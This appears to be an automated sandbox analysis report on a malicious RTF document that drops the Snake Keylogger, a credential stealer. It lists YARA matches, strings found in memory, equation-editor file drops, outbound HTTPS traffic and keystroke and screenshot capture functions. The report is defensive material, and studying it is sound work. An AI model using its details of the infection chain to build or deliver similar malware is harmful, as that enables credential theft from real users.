                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.754
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                Source: wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                Source: wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                Source: wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000350D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003567000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000361B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                Source: wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                Source: wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                Source: wealthcharliebgk.exe, 00000008.00000002.876897343.000000000351A000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003552000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035CE000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003606000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture screen (.Net source)
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Contains functionality to log keystrokes (.Net Source)
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Initial sample is an obfuscated RTF file
                Source: initial sampleStatic file information: Filename: Xkl0PnD8zFPjfh1.wiz.rtf
                Malicious sample detected (through community Yara rule)
                Source: Xkl0PnD8zFPjfh1.wiz.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: wealthcharliebgk.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: wealthcharliebgk.exe PID: 3860, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_0048070C5_2_0048070C
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_00483C785_2_00483C78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_0048E1905_2_0048E190
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_0048E6785_2_0048E678
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_0048163C5_2_0048163C
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_004817F05_2_004817F0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_0048D9205_2_0048D920
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_0048EAB05_2_0048EAB0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_0048DD585_2_0048DD58
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 5_2_0048DD505_2_0048DD50
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002440F88_2_002440F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002481008_2_00248100
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024390C8_2_0024390C
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002449688_2_00244968
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002431B18_2_002431B1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002469B88_2_002469B8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00249A4C8_2_00249A4C
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002443C88_2_002443C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002434838_2_00243483
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002474908_2_00247490
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00245D008_2_00245D00
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024DD508_2_0024DD50
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00249DB08_2_00249DB0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00243E288_2_00243E28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002446998_2_00244699
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00248EC48_2_00248EC4
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_002487E08_2_002487E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024E8A88_2_0024E8A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024F1D98_2_0024F1D9
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024FB088_2_0024FB08
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024ED408_2_0024ED40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024DD418_2_0024DD41
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024D5B88_2_0024D5B8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024D5C88_2_0024D5C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_0024F6708_2_0024F670
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004700408_2_00470040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004732408_2_00473240
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004764408_2_00476440
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00471C608_2_00471C60
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00474E608_2_00474E60
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004780608_2_00478060
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00472C008_2_00472C00
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00475E008_2_00475E00
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004790008_2_00479000
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004716208_2_00471620
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004748208_2_00474820
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00477A208_2_00477A20
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00470CC08_2_00470CC0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00473EC08_2_00473EC0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004770C08_2_004770C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004728E08_2_004728E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00475AE08_2_00475AE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00478CE08_2_00478CE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004706808_2_00470680
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004738808_2_00473880
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00476A808_2_00476A80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004722A08_2_004722A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004754A08_2_004754A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004786A08_2_004786A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004719408_2_00471940
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00474B408_2_00474B40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00477D408_2_00477D40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004703608_2_00470360
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004735608_2_00473560
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004767608_2_00476760
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004713008_2_00471300
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004745008_2_00474500
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004777008_2_00477700
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00472F208_2_00472F20
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004761208_2_00476120
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004725C08_2_004725C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004757C08_2_004757C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004789C08_2_004789C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00470FE08_2_00470FE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004741E08_2_004741E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004773E08_2_004773E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00471F808_2_00471F80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004751808_2_00475180
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004783808_2_00478380
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004709908_2_00470990
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004709A08_2_004709A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00473BA08_2_00473BA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00476DA08_2_00476DA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_004789B08_2_004789B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C82B08_2_005C82B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C40508_2_005C4050
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CE2508_2_005CE250
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C37528_2_005C3752
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C9F4F8_2_005C9F4F
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C57488_2_005C5748
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CB7488_2_005CB748
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C00408_2_005C0040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C6E408_2_005C6E40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C8C408_2_005C8C40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C40408_2_005C4040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C60788_2_005C6078
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C87788_2_005C8778
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CDD788_2_005CDD78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C09708_2_005C0970
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C77708_2_005C7770
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CF5708_2_005CF570
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C49708_2_005C4970
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CB2728_2_005CB272
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C20688_2_005C2068
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CCA688_2_005CCA68
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C60688_2_005C6068
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C87678_2_005C8767
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C37608_2_005C3760
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C9F608_2_005C9F60
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C09608_2_005C0960
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C77608_2_005C7760
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C4E188_2_005C4E18
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CE7188_2_005CE718
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CA4188_2_005CA418
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C65108_2_005C6510
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CBC108_2_005CBC10
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C0E088_2_005C0E08
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C7C088_2_005C7C08
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C91088_2_005C9108
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C4E098_2_005C4E09
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CE7098_2_005CE709
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C25008_2_005C2500
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C65008_2_005C6500
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CE23F8_2_005CE23F
